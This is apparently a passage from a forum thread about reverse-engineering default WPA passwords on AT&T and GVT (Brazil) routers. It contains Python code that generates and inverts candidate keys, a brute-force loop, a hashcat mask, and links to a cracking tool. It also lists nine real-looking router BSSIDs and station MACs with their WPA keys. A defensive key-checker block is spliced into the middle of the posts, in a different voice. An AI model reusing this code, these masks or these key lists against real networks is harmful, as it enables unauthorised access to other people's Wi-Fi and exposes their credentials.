Keyspace List for WPA on Default Routers
#81
(08-15-2017, 02:26 AM)mrfancypants Wrote: I am not sure I even understand your difficulty.

Let's take NVG589 specifically. We have an algorithm that takes in a 64-bit integer 'x' and spits out a 12-letter password:

for n in range(0,6):
    pw=pw_charset[x%37] + pw
    x/=37
    pw=chr(50+(x%8)) + pw
    x/=37

For whatever reason, AT&T people don't just pull an 'x' out of an RNG or something; instead they pull a 31-bit int and multiply it by a magic number that is approximately 465661287.5245797. (Or possibly do some slightly longer sequence of multiplications and additions which amounts to the same thing, because simply multiplying by that number does not always yield the exact result. But ignore that for now.)

Now, where did they get 465661287.5245797? Beats me. All I know is: (1) if they are starting with a 31-bit number, they had to multiply by _something_ (to span the whole range of passwords), since feeding a 31-bit value directly into the code above would always result in passwords that start with 2a2a2a..; (2) that exact value reproduces many of the passwords I see in the wild and that can't be a coincidence. (To calculate it, I basically had the computer run through all possible values until it found one that gave lots of hits.)

For NVG599, they tweak the number->password conversion algorithm and replace the 465... value with 2^32+2. Again, why 2^32+2? Not a clue.

Any guesses as to the float number that the 5268AC might be using?

Or is the 5268AC using a variation of the 599 scheme?

I haven't looked at this in at least a couple weeks, but I got as far as modifying some of the python for the 599 and experimenting with different values for where the pwgen function starts (normally at 2^32+2).

Something like this. I am incrementing "m" in this example. The first 6 digits were input from an eBay listing for testing.

Code:
pw_charset='abcdefghijkmnpqrstuvwxyz23456789#%+=?'

def pwgen(x, m):
    # NVG599-style scheme: multiply the seed by 2^32+m (2^32+2 in the
    # stock algorithm), round through a float, then emit 12 base-37 symbols.
    x*=2**32+m
    x=int(float(x))
    pw=''
    for n in range(0,12):
        rem=x%37
        pw=pw_charset[rem]+pw
        x//=37
    return pw

def pw_to_candidate_ints(x, m):
    # Invert pwgen for a known password prefix: the prefix pins x to a range
    # of values; divide by the same multiplier pwgen uses to get seed candidates.
    mult=2**32+m
    val=0
    l=len(x)
    for n in range(0,l):
        val+=pw_charset.find(x[n])*(37**(11-n))
    cands=list(range(val//mult, (val+37**(12-l))//mult+1))
    # Values above 37**12 wrap, so the same prefix also comes from val+37**12.
    val+=37**12
    cands+=list(range(val//mult, (val+37**(12-l))//mult+1))
    return [y for y in cands if pwgen(y, m)[:l]==x]

for m in range(0, 2147483648):
    candidates=pw_to_candidate_ints('9d4c8c', m)
    for x in candidates:
        print(m, pwgen(x, m))

I was aiming to get it to produce output valid for 5268AC devices. It was worth a shot, but didn't work.

I am going to have to go back in this thread and see if there was python for the 589 that can be tested.  Perhaps all that is needed for the 5268AC is a different "magic number", a correct floating point value that produces the correct result.

Has anyone had time to experiment?
Reply
#82
Here in Brazil we have an ISP called GVT.
The default password is the Serial Number of the wireless router.
Here is an example:

D-Link
SSID: GVT-8A8A
PASS: N1B9027544
SERIAL: PJ2N1B9027544
MAC: 84:C9:B2:EB:8A:8A

Just count 10 chars from right to left, and that is the WPA/WPA2 Key.
My question is: is there a way to calculate the Serial Number?
D-Link was used in this example, but it can be Arcadyan, Sagemcom, etc. It will always be the Serial Number.
Using Wireshark, the serial number received isn't the same as the one on the sticker on the bottom.
Thank you for your time.
Reply
#83
Hi all.

Thanks to a member of the forum, I have good news about the GVT network.
The task is not completed yet, but we have new information to share.
1) The first 3 chars of the password come from the OUI. E.g.:
OUI        Partial Pass   Router Brand
6c:19:8f   91E            D-Link International
84:c9:b2   N1B            D-Link International
ec:22:80   S1E            D-Link International
So, if the router is a D-Link, we can get the 1st, 2nd and 3rd digits from the OUI.
The last 6 chars are only numbers.
The 4th position can be a number or a letter.
The mask for hashcat is: <OUI - info>?1?d?d?d?d?d?d -1 ?u?d
The serial should be linked to the MAC, but I really lack the skill to analyze the firmware.
Any help will be more than welcome here.

A few pairs to analyse:
BSSID:Station MAC:ESSID:WPA/WPA2
ec2280d30193:fc15b4365e87:GVT-0193:S1E9051450
6c198f02b804:40786ac94fe1:GVT-B805:91E5007819
6815905da437:a89fba14ad7c:GVT-A436:5067014811
c4a81d7f4054:c06599c2d762:GVT-4056:91DC064046
6c198f027914:7ce9d3d7b853:GVT-7917:91E4019783
6c198f023368:d022bed72ab1:GVT-336B:91E4008101
84c9b2eb327d:5c0a5b1f7cd9:GVT-327C:N1B9006527
84c9b2ebbbff:cc52af6190a4:GVT-BBFE:N1B9033142
ec228045ef13:e006e6d03827:GVT-EF13:S1E8013780

Thank you all!

Edit: link to download a firmware
http://ryan.com.br/wp/download/Firmware/...com.br.zip

(08-25-2017, 11:40 PM)zarabatana Wrote: Here in Brazil we have an ISP called GVT...
Reply
#84
Hi Zarabatana,

thank you for the information.

Could you explain how you got "91E" from "6c:19:8f"?

Thanks.

(09-07-2017, 08:36 PM)zarabatana Wrote: Hi all. Thanks to a member of the forum, I have good news about the GVT network...
Reply
#85
Hi robertoakira1.

It is fixed.
Analyzing a few default pairs of BSSID:KEY, you can see this relation. E.g.:
BSSID:KEY
6c198f02b804:91E5007819
6c198f027914:91E4019783
6c198f023368:91E4008101

As you can see, every time the OUI is 6c198f the KEY starts with 91E.
That is valid for GVT ISP (Brazil).
If I can help with something more, just ask.

(09-09-2017, 04:06 AM)robertoakira1 Wrote: Hi Zarabatana, thank you for the information...
Reply
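As an added example (my own code, not posted by anyone in this thread), the following takes the nine BSSID:station:ESSID:key pairs from zarabatana's post, rebuilds the OUI-to-prefix table he describes, and uses it to check whether a given key still follows the weak default pattern, which is the test a network owner would run before deciding to change the key. The names POSTED_PAIRS, KEY_SHAPE, parse_pairs, prefix_by_oui and looks_like_gvt_default are my own.

```python
import re
from collections import defaultdict

# The nine BSSID:station:ESSID:key pairs posted above, copied verbatim.
POSTED_PAIRS = """\
ec2280d30193:fc15b4365e87:GVT-0193:S1E9051450
6c198f02b804:40786ac94fe1:GVT-B805:91E5007819
6815905da437:a89fba14ad7c:GVT-A436:5067014811
c4a81d7f4054:c06599c2d762:GVT-4056:91DC064046
6c198f027914:7ce9d3d7b853:GVT-7917:91E4019783
6c198f023368:d022bed72ab1:GVT-336B:91E4008101
84c9b2eb327d:5c0a5b1f7cd9:GVT-327C:N1B9006527
84c9b2ebbbff:cc52af6190a4:GVT-BBFE:N1B9033142
ec228045ef13:e006e6d03827:GVT-EF13:S1E8013780
"""

# Key shape described in the thread: three OUI-linked chars, one ?u/?d, six digits
# (the same structure as the posted hashcat mask <prefix>?1?d?d?d?d?d?d -1 ?u?d).
KEY_SHAPE = re.compile(r"^[A-Z0-9]{3}[A-Z0-9][0-9]{6}$")

def parse_pairs(text):
    """Split the posted lines into (bssid, essid, key); the station MAC is not needed."""
    rows = []
    for line in text.splitlines():
        bssid, _station, essid, key = line.strip().split(":")
        rows.append((bssid.lower(), essid, key))
    return rows

def prefix_by_oui(rows):
    """OUI (first three BSSID bytes) -> sorted list of 3-char key prefixes seen with it."""
    seen = defaultdict(set)
    for bssid, _essid, key in rows:
        seen[bssid[:6]].add(key[:3])
    return {oui: sorted(p) for oui, p in seen.items()}

def looks_like_gvt_default(bssid, essid, key, table):
    """True when the key still follows the default pattern learned for this OUI."""
    bssid = bssid.lower().replace(":", "").replace("-", "")
    if not essid.startswith("GVT-") or not KEY_SHAPE.match(key):
        return False
    return key[:3] in table.get(bssid[:6], [])
```

All nine posted keys match KEY_SHAPE, and prefix_by_oui reproduces the 6c:19:8f/84:c9:b2/ec:22:80 table from the post (plus the two OUIs the post did not tabulate).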
#86
Finally fixed my NVG599 code, took me a while to figure out what I did wrong... my output was 2a2a2a.... and I realized that I hadn't done the exponentiation correctly. Feel free to laugh and drop some nasty comments: https://github.com/soxrok2212/PSKracker/...fbe082c54b
Reply
#87
For what it's worth, I wrote some code (currently as a separate piece of PSKracker) to calculate the seed given the password as an input parameter. Currently only for NVG589 models but I'll work on the rest. Can use this for eBay sticker searches so we can hopefully find where the seeds come from. Usage is:
Code:
./pskracker -f <psk_here>

Will return the seed in decimal if found.

https://github.com/soxrok2212/PSKracker/tree/seed
Reply
#88
(11-09-2017, 10:39 PM)fart-box Wrote:
(11-04-2017, 03:03 AM)soxrok2212 Wrote: For what it's worth, I wrote some code...

So if anyone has any actual 5268AC passwords they could post on this thread, it would sure help.

Do you think searching eBay for 5268AC labels is a good strategy?

Also, what do you mean by 'Passwords as close to one another as possible?' Just trying to understand what that means, precisely.

TIA,
-Cal
Reply
#89
Hi fart-box... I laugh at that every time,

I guess what I am searching for in recovering the seeds is some kind of link to another piece of information, i.e. MAC address, serial number, SSID, something.

I know there must be something. The seed HAS to be from somewhere. I doubt they made a generator that's easy enough to run through all possibilities in an hour with average hardware yet made the seed completely random.

So if you take the code for seed recovery and input known passwords then make a list of MAC addresses, serial numbers, SSIDs, seeds and whatever else, I'm sure we will find the pattern.
Reply
#90
Do you have a list of default SSIDs for those routers? Or are those just ATT*?
Reply